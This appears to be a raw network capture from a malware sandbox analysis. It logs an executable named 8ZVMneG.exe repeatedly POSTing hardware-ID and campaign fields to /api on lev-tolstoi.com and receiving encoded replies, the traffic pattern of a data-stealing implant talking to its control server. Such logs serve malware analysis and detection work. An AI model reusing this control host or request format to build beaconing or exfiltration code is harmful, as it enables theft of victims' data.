                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=o0i6mvr0n6okc1n4eiejmlgfjk; expires=Mon, 14 Apr 2025 23:50:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cmaSi0TMw41Ovb5tOBasT2xYZuH4obbIoWyEWh5CaFE2nvAniulQjcx0yWI8TdNulqS54x47eTKZZJWX%2F9XxtPX6gAtJeT%2BBa7DPvjifIzoxr8PNwZMkjluyHclHR6i0qC4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8f4d6f1fff114308-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1600&rtt_var=606&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=953&delivery_rate=1796923&cwnd=228&unsent_bytes=0&cid=0f9719e623d9fd62&ts=794&x=0"
                                                                                                                                                                                                                                                                2024-12-20 06:04:17 UTC248INData Raw: 63 34 38 0d 0a 75 37 39 31 43 30 71 73 6e 76 47 4f 38 30 4e 73 62 6f 79 6b 62 35 52 50 35 71 6d 70 67 65 41 67 55 51 74 64 54 54 6f 44 55 46 48 41 6e 51 4d 70 63 4a 69 79 30 2f 32 57 59 56 59 61 2f 74 45 4b 75 47 32 48 7a 59 75 37 68 6b 45 39 65 44 68 68 47 48 55 39 63 34 48 5a 46 47 63 35 79 62 4c 54 36 34 74 68 56 6a 58 33 68 67 72 36 62 64 79 4c 7a 4f 75 43 51 54 31 70 50 43 5a 56 63 7a 77 79 30 39 4d 53 59 79 2f 50 2b 70 44 69 6e 69 59 4a 43 2b 33 4f 41 66 30 69 6a 73 53 4c 72 63 4a 46 4b 79 6c 6e 62 33 64 6d 4a 44 44 32 33 67 5a 67 61 4e 47 79 69 71 79 57 4c 55 35 55 72 73 55 4b 39 69 4f 41 7a 63 4c 70 69 45 67 31 61 44 6b 6e 53 6d 6f 32 4f 64 50 64 45 57 49 6c 78 75 36 64 36 4a 6b 74 44 77 48 74 68 6b 4f 32 4b 70 79 4c 6b 36 50
                                                                                                                                                                                                                                                                Data Ascii: c48u791C0qsnvGO80Nsboykb5RP5qmpgeAgUQtdTToDUFHAnQMpcJiy0/2WYVYa/tEKuG2HzYu7hkE9eDhhGHU9c4HZFGc5ybLT64thVjX3hgr6bdyLzOuCQT1pPCZVczwy09MSYy/P+pDiniYJC+3OAf0ijsSLrcJFKylnb3dmJDD23gZgaNGyiqyWLU5UrsUK9iOAzcLpiEg1aDknSmo2OdPdEWIlxu6d6JktDwHthkO2KpyLk6P
                                                                                                                                                                                                                                                                2024-12-20 06:04:17 UTC1369INData Raw: 52 63 44 42 34 4c 6a 70 56 63 54 52 7a 78 70 4d 4f 4b 53 2f 43 76 4d 75 73 6d 53 30 41 43 65 33 4a 43 76 63 74 6c 73 54 4c 34 49 70 4b 4e 32 4d 77 49 46 64 76 4f 44 54 52 31 42 42 6d 4c 38 62 36 6e 4f 2f 52 62 30 34 4c 39 6f 5a 56 74 67 32 55 79 4d 6a 33 6a 31 4e 7a 64 6e 45 32 47 47 59 2b 63 34 47 64 45 57 63 70 77 2f 79 42 35 4a 6f 71 43 78 37 6c 7a 77 44 37 4c 59 6e 42 78 4f 43 43 52 54 6c 6a 4d 43 56 63 62 44 38 31 32 64 31 58 4a 32 6a 4a 35 4e 4f 30 30 51 49 4c 48 4f 6e 4b 47 37 51 58 78 4e 53 46 2b 73 4a 46 50 79 6c 6e 62 31 42 6b 4d 54 44 53 30 68 52 68 49 39 7a 38 67 65 71 63 4a 42 77 4b 36 38 67 48 39 54 2b 4f 78 63 33 67 69 30 6b 36 62 44 67 72 47 43 39 79 4e 4d 47 64 54 79 6b 4a 77 2f 65 66 35 6f 59 68 54 68 4f 67 33 30 33 78 49 63 53 54 69 2b
                                                                                                                                                                                                                                                                Data Ascii: RcDB4LjpVcTRzxpMOKS/CvMusmS0ACe3JCvctlsTL4IpKN2MwIFdvODTR1BBmL8b6nO/Rb04L9oZVtg2UyMj3j1NzdnE2GGY+c4GdEWcpw/yB5JoqCx7lzwD7LYnBxOCCRTljMCVcbD812d1XJ2jJ5NO00QILHOnKG7QXxNSF+sJFPylnb1BkMTDS0hRhI9z8geqcJBwK68gH9T+Oxc3gi0k6bDgrGC9yNMGdTykJw/ef5oYhThOg303xIcSTi+
                                                                                                                                                                                                                                                                2024-12-20 06:04:17 UTC1369INData Raw: 4a 33 38 6f 51 43 46 71 63 2f 50 65 41 32 6f 69 6a 4d 6d 51 34 70 38 6d 47 45 7a 78 69 42 53 32 4b 6f 69 4c 6b 36 4f 50 51 7a 74 76 4c 53 42 56 59 6a 77 39 31 74 67 59 59 53 6a 4f 38 5a 62 6f 6d 69 6f 4e 41 65 72 55 42 2f 59 6c 67 63 72 42 36 63 49 4d 63 32 34 6e 62 77 41 68 41 79 54 53 6e 79 4a 71 4a 73 44 37 68 61 79 4f 62 78 64 4d 36 63 70 4e 72 6d 32 4a 77 38 37 6d 6a 55 4d 35 5a 7a 6f 6c 56 47 6b 38 4d 4d 76 53 45 32 6b 6b 78 76 61 65 34 70 55 70 42 77 66 6c 77 41 33 33 4a 38 53 46 69 2b 53 61 41 6d 73 70 43 79 68 55 62 44 31 78 37 4e 34 5a 5a 79 2f 59 76 49 79 69 69 47 45 4a 41 4b 36 65 54 66 6f 6b 68 4d 44 42 35 34 4a 46 50 6d 77 38 4b 46 74 73 4e 54 6e 58 32 68 4e 6c 49 63 50 36 6b 2b 75 56 4a 42 77 4a 35 38 6f 42 74 6d 50 45 7a 4e 4f 6a 32 67 49
                                                                                                                                                                                                                                                                Data Ascii: J38oQCFqc/PeA2oijMmQ4p8mGEzxiBS2KoiLk6OPQztvLSBVYjw91tgYYSjO8ZbomioNAerUB/YlgcrB6cIMc24nbwAhAyTSnyJqJsD7hayObxdM6cpNrm2Jw87mjUM5ZzolVGk8MMvSE2kkxvae4pUpBwflwA33J8SFi+SaAmspCyhUbD1x7N4ZZy/YvIyiiGEJAK6eTfokhMDB54JFPmw8KFtsNTnX2hNlIcP6k+uVJBwJ58oBtmPEzNOj2gI
                                                                                                                                                                                                                                                                2024-12-20 06:04:17 UTC165INData Raw: 77 41 68 4f 7a 72 4c 30 78 6c 67 4a 63 6a 30 6c 4f 4b 63 4b 67 67 48 36 63 45 4c 2b 79 57 4a 7a 73 6a 69 68 6b 67 68 61 6a 51 6c 56 57 74 79 66 5a 6e 61 44 79 6c 77 6a 74 75 66 78 59 45 36 48 42 71 75 32 55 50 76 62 59 50 48 69 37 76 43 51 54 78 67 4d 43 64 51 62 6a 30 33 31 39 73 52 5a 43 33 42 39 6f 48 6b 6e 79 77 46 41 2b 58 55 44 66 73 70 69 4d 2f 44 36 49 67 43 66 53 6b 34 4e 78 67 35 63 67 62 55 30 68 64 71 50 6f 37 6a 33 66 58 52 4a 67 4a 4d 74 6f 59 42 2b 43 32 4c 78 38 66 6f 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: wAhOzrL0xlgJcj0lOKcKggH6cEL+yWJzsjihkghajQlVWtyfZnaDylwjtufxYE6HBqu2UPvbYPHi7vCQTxgMCdQbj0319sRZC3B9oHknywFA+XUDfspiM/D6IgCfSk4Nxg5cgbU0hdqPo7j3fXRJgJMtoYB+C2Lx8fo
                                                                                                                                                                                                                                                                2024-12-20 06:04:17 UTC1369INData Raw: 33 63 64 34 0d 0a 69 6b 4d 2f 5a 7a 67 71 55 57 6b 36 49 64 6a 5a 48 32 67 6d 77 66 32 58 36 5a 51 6c 43 51 6a 6f 79 55 32 34 62 59 50 54 69 37 76 43 62 52 52 63 66 51 35 69 49 53 31 39 77 4a 30 51 5a 57 69 57 76 4a 2f 76 6e 53 6b 42 43 75 66 4b 42 2f 38 6d 69 4d 44 50 37 34 74 48 4e 57 67 36 4b 6c 6c 6c 50 6a 6e 66 33 68 52 6d 4a 38 48 30 30 36 4c 52 4a 68 5a 4d 74 6f 59 6f 34 53 61 4b 7a 59 76 38 7a 46 74 7a 62 6a 4e 76 41 43 45 2b 4f 74 2f 62 45 6d 55 70 79 50 53 57 35 4a 55 67 43 41 72 74 79 51 6e 7a 4c 49 76 50 78 2b 32 49 51 7a 4a 6c 4e 43 42 54 5a 48 4a 39 6d 64 6f 50 4b 58 43 4f 7a 5a 44 36 68 6a 45 43 54 50 47 49 46 4c 59 71 69 49 75 54 6f 34 4e 51 4f 57 4d 78 4b 6c 64 6b 4d 54 7a 65 30 42 46 6c 49 73 66 30 6c 65 4f 59 4d 77 30 41 34 4d 45 44 2b
                                                                                                                                                                                                                                                                Data Ascii: 3cd4ikM/ZzgqUWk6IdjZH2gmwf2X6ZQlCQjoyU24bYPTi7vCbRRcfQ5iIS19wJ0QZWiWvJ/vnSkBCufKB/8miMDP74tHNWg6KlllPjnf3hRmJ8H006LRJhZMtoYo4SaKzYv8zFtzbjNvACE+Ot/bEmUpyPSW5JUgCArtyQnzLIvPx+2IQzJlNCBTZHJ9mdoPKXCOzZD6hjECTPGIFLYqiIuTo4NQOWMxKldkMTze0BFlIsf0leOYMw0A4MED+
                                                                                                                                                                                                                                                                2024-12-20 06:04:17 UTC1369INData Raw: 45 35 49 56 4c 4f 48 73 31 4b 46 39 71 4f 6a 6a 57 32 77 56 6c 4a 74 7a 35 67 66 37 52 62 30 34 4c 39 6f 5a 56 74 68 75 44 32 39 76 67 77 48 4d 6c 61 69 6b 6b 56 57 31 79 4c 4a 66 45 56 32 34 6b 6a 71 54 54 36 70 34 6f 44 51 50 76 7a 77 48 37 4b 49 33 4f 79 75 57 47 53 44 6c 70 4f 53 6c 5a 5a 44 67 77 32 4e 63 65 62 69 44 4a 2f 34 47 73 33 32 45 4a 46 4b 36 65 54 64 38 71 6c 73 58 62 6f 35 30 4d 4b 69 6b 34 49 78 67 35 63 6a 66 54 30 68 4e 75 4a 4d 6a 35 6c 65 47 51 4c 67 38 4d 34 63 49 47 2f 79 75 46 78 73 37 75 68 6c 41 35 59 6a 41 6a 55 57 30 2f 63 35 65 64 45 48 46 6f 6c 72 79 69 34 5a 38 76 43 52 71 75 32 55 50 76 62 59 50 48 69 37 76 43 51 7a 39 6d 50 43 42 62 59 6a 4d 35 79 38 38 62 59 43 44 4c 38 4a 6a 69 6c 7a 4d 49 41 2b 66 46 44 76 38 71 6a 4d
                                                                                                                                                                                                                                                                Data Ascii: E5IVLOHs1KF9qOjjW2wVlJtz5gf7Rb04L9oZVthuD29vgwHMlaikkVW1yLJfEV24kjqTT6p4oDQPvzwH7KI3OyuWGSDlpOSlZZDgw2NcebiDJ/4Gs32EJFK6eTd8qlsXbo50MKik4Ixg5cjfT0hNuJMj5leGQLg8M4cIG/yuFxs7uhlA5YjAjUW0/c5edEHFolryi4Z8vCRqu2UPvbYPHi7vCQz9mPCBbYjM5y88bYCDL8JjilzMIA+fFDv8qjM
                                                                                                                                                                                                                                                                2024-12-20 06:04:17 UTC1369INData Raw: 52 53 49 70 5a 7a 6c 49 64 6a 55 73 6c 38 52 58 62 69 53 4f 70 4e 50 71 6d 43 63 4a 43 75 44 55 43 50 41 69 69 38 4c 43 35 34 70 42 4d 32 30 37 4b 46 31 69 50 6a 6a 65 33 68 68 74 49 63 44 31 6e 4b 7a 66 59 51 6b 55 72 70 35 4e 31 7a 61 48 78 38 61 6a 6e 51 77 71 4b 54 67 6a 47 44 6c 79 50 39 66 59 46 32 4d 75 79 76 6d 56 35 70 51 68 42 51 2f 68 77 67 76 79 49 6f 54 41 77 75 4b 45 52 7a 6c 69 4f 53 4a 62 5a 7a 52 7a 6c 35 30 51 63 57 69 57 76 4c 50 33 6e 43 30 4a 54 50 47 49 46 4c 59 71 69 49 75 54 6f 34 6c 4f 4e 32 34 2f 49 6c 74 70 4e 7a 66 54 32 42 64 68 4f 73 62 38 6c 50 36 44 49 51 63 4a 34 73 55 4e 38 69 75 4e 7a 63 6a 6e 77 67 78 7a 62 69 64 76 41 43 45 66 50 39 37 30 45 48 4a 6f 30 62 4b 4b 72 4a 59 74 54 6c 53 75 78 77 62 38 49 6f 6e 49 7a 65 43
                                                                                                                                                                                                                                                                Data Ascii: RSIpZzlIdjUsl8RXbiSOpNPqmCcJCuDUCPAii8LC54pBM207KF1iPjje3hhtIcD1nKzfYQkUrp5N1zaHx8ajnQwqKTgjGDlyP9fYF2MuyvmV5pQhBQ/hwgvyIoTAwuKERzliOSJbZzRzl50QcWiWvLP3nC0JTPGIFLYqiIuTo4lON24/IltpNzfT2BdhOsb8lP6DIQcJ4sUN8iuNzcjnwgxzbidvACEfP970EHJo0bKKrJYtTlSuxwb8IonIzeC
                                                                                                                                                                                                                                                                2024-12-20 06:04:17 UTC1369INData Raw: 51 59 32 47 48 64 79 61 34 75 54 56 33 74 6f 6c 72 7a 55 37 34 4d 7a 43 41 2f 34 78 55 72 49 45 36 50 64 77 65 53 53 52 53 52 6d 66 32 45 59 62 6e 4a 72 34 4a 30 65 62 6a 50 66 36 70 37 38 6c 6d 45 78 51 71 37 65 54 61 35 74 73 63 6a 46 37 59 56 55 49 69 51 59 4f 56 4a 6d 49 6a 54 4f 30 6c 63 6e 61 4d 69 38 79 37 2f 66 59 51 6f 64 72 70 35 64 70 48 62 52 6d 4a 79 7a 30 46 31 39 63 48 38 35 47 44 6c 67 66 5a 6e 50 56 7a 46 6f 69 66 2b 42 2f 70 63 69 47 41 2b 70 2b 44 50 52 4e 34 6e 4e 33 50 4b 38 66 44 52 7a 4d 69 6c 50 63 48 34 6d 32 74 4d 5a 62 6a 36 4f 73 74 50 6a 30 58 6b 33 54 4b 61 47 4d 72 68 74 6e 49 75 54 6f 37 64 42 50 57 63 34 4f 55 6b 73 46 53 6e 55 32 77 42 34 61 49 43 38 6c 61 7a 4a 63 55 42 4d 36 74 64 4e 72 6e 33 57 6b 4a 36 77 31 52 4a 68
                                                                                                                                                                                                                                                                Data Ascii: QY2GHdya4uTV3tolrzU74MzCA/4xUrIE6PdweSSRSRmf2EYbnJr4J0ebjPf6p78lmExQq7eTa5tscjF7YVUIiQYOVJmIjTO0lcnaMi8y7/fYQodrp5dpHbRmJyz0F19cH85GDlgfZnPVzFoif+B/pciGA+p+DPRN4nN3PK8fDRzMilPcH4m2tMZbj6OstPj0Xk3TKaGMrhtnIuTo7dBPWc4OUksFSnU2wB4aIC8lazJcUBM6tdNrn3WkJ6w1RJh
                                                                                                                                                                                                                                                                2024-12-20 06:04:17 UTC1369INData Raw: 5a 30 4d 54 33 58 32 67 46 34 61 49 43 38 6e 4b 7a 4a 47 45 35 45 72 76 6c 44 74 6a 58 45 6b 34 76 57 67 55 77 39 62 69 6b 2b 46 55 59 38 4e 4e 6a 4c 42 33 34 6e 6a 72 4c 54 36 74 46 35 58 45 4b 75 77 68 79 32 64 64 53 5a 6b 4c 62 52 46 57 4d 37 49 47 46 42 49 53 52 7a 67 59 39 5a 4b 54 71 4f 70 4e 4f 72 6b 6a 4d 63 43 75 33 51 44 72 45 54 75 75 7a 46 35 49 4e 55 49 33 34 77 59 48 5a 58 45 77 33 6e 79 42 52 6e 4a 73 6e 71 67 71 7a 66 59 51 46 4d 74 76 39 4e 76 6d 32 37 68 59 76 37 77 68 70 7a 58 44 77 68 56 6d 59 6b 49 70 54 36 47 57 34 70 32 4f 79 45 34 39 34 50 4f 43 32 75 69 45 33 77 62 64 79 5a 68 61 4f 47 55 33 4d 78 62 33 30 44 4e 47 46 6b 69 59 38 49 4a 7a 47 4f 36 74 4f 30 77 32 39 4f 48 71 36 65 54 62 45 75 6c 74 6e 4e 34 4a 52 42 64 46 63 42 43
                                                                                                                                                                                                                                                                Data Ascii: Z0MT3X2gF4aIC8nKzJGE5ErvlDtjXEk4vWgUw9bik+FUY8NNjLB34njrLT6tF5XEKuwhy2ddSZkLbRFWM7IGFBISRzgY9ZKTqOpNOrkjMcCu3QDrETuuzF5INUI34wYHZXEw3nyBRnJsnqgqzfYQFMtv9Nvm27hYv7whpzXDwhVmYkIpT6GW4p2OyE494POC2uiE3wbdyZhaOGU3Mxb30DNGFkiY8IJzGO6tO0w29OHq6eTbEultnN4JRBdFcBC


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                5192.168.2.649748104.21.66.864432144C:\Users\user\Desktop\8ZVMneG.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-20 06:04:20 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=C5PLJO8RR7LUD8CMHBI
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Length: 12872
                                                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                2024-12-20 06:04:20 UTC12872OUTData Raw: 2d 2d 43 35 50 4c 4a 4f 38 52 52 37 4c 55 44 38 43 4d 48 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 45 33 39 46 43 46 42 44 38 33 43 43 45 34 41 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 43 35 50 4c 4a 4f 38 52 52 37 4c 55 44 38 43 4d 48 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 35 50 4c 4a 4f 38 52 52 37 4c 55 44 38 43 4d 48 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6e 62
                                                                                                                                                                                                                                                                Data Ascii: --C5PLJO8RR7LUD8CMHBIContent-Disposition: form-data; name="hwid"DE39FCFBD83CCE4A00D57F9DDD37BE0C--C5PLJO8RR7LUD8CMHBIContent-Disposition: form-data; name="pid"2--C5PLJO8RR7LUD8CMHBIContent-Disposition: form-data; name="lid"LPnhqo--nb
                                                                                                                                                                                                                                                                2024-12-20 06:04:21 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:04:20 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=891dkufa0vvc5utqgggqlvdqgg; expires=Mon, 14 Apr 2025 23:50:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=awDKqHLI4AF0WHFJZMrYNW%2FcSmdLEDTv2PN0kiWDkC5UvfAjlnDWUwYPNMLlOj7DBJ1W6ACFNpiqAK7UAfpUp%2FXoFKz4KBYLgaqvyOwZQJ7%2B%2Fc1iqUjPnEiBaxgSBN1%2Bbx4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8f4d6f33aef732e8-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1829&min_rtt=1824&rtt_var=694&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13812&delivery_rate=1564844&cwnd=246&unsent_bytes=0&cid=244679ab460a4570&ts=838&x=0"
                                                                                                                                                                                                                                                                2024-12-20 06:04:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                2024-12-20 06:04:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                6192.168.2.649754104.21.66.864432144C:\Users\user\Desktop\8ZVMneG.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-20 06:04:22 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=UB6YY78GPNR7GMOC0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Length: 15106
                                                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                2024-12-20 06:04:22 UTC15106OUTData Raw: 2d 2d 55 42 36 59 59 37 38 47 50 4e 52 37 47 4d 4f 43 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 45 33 39 46 43 46 42 44 38 33 43 43 45 34 41 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 55 42 36 59 59 37 38 47 50 4e 52 37 47 4d 4f 43 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 42 36 59 59 37 38 47 50 4e 52 37 47 4d 4f 43 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6e 62 67 6e 78 64 6c 78
                                                                                                                                                                                                                                                                Data Ascii: --UB6YY78GPNR7GMOC0Content-Disposition: form-data; name="hwid"DE39FCFBD83CCE4A00D57F9DDD37BE0C--UB6YY78GPNR7GMOC0Content-Disposition: form-data; name="pid"2--UB6YY78GPNR7GMOC0Content-Disposition: form-data; name="lid"LPnhqo--nbgnxdlx
                                                                                                                                                                                                                                                                2024-12-20 06:04:23 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:04:23 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=t5ocvu3tsdco4ui943q0i1l4jg; expires=Mon, 14 Apr 2025 23:51:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MupKHKlg%2FR6eGrwT1w65qapVZrlv%2BEmWgQ8mOamvVvripubck6GpfEilCG5zDNLMrQpGSB49vecoNGiNCD31vGAV%2FTW%2BWp5adgoAlJzH32zXHgE8f8Mxn20wrZgjPN3M7hU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8f4d6f411f18429b-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2028&min_rtt=2020&rtt_var=774&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2834&recv_bytes=16044&delivery_rate=1399137&cwnd=237&unsent_bytes=0&cid=e472886c2374796c&ts=816&x=0"
                                                                                                                                                                                                                                                                2024-12-20 06:04:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                2024-12-20 06:04:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                7192.168.2.649760104.21.66.864432144C:\Users\user\Desktop\8ZVMneG.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-20 06:04:24 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=ICQ9J4SUMK0W7VEBGUY
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Length: 19976
                                                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                2024-12-20 06:04:24 UTC15331OUTData Raw: 2d 2d 49 43 51 39 4a 34 53 55 4d 4b 30 57 37 56 45 42 47 55 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 45 33 39 46 43 46 42 44 38 33 43 43 45 34 41 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 49 43 51 39 4a 34 53 55 4d 4b 30 57 37 56 45 42 47 55 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 49 43 51 39 4a 34 53 55 4d 4b 30 57 37 56 45 42 47 55 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6e 62
                                                                                                                                                                                                                                                                Data Ascii: --ICQ9J4SUMK0W7VEBGUYContent-Disposition: form-data; name="hwid"DE39FCFBD83CCE4A00D57F9DDD37BE0C--ICQ9J4SUMK0W7VEBGUYContent-Disposition: form-data; name="pid"3--ICQ9J4SUMK0W7VEBGUYContent-Disposition: form-data; name="lid"LPnhqo--nb
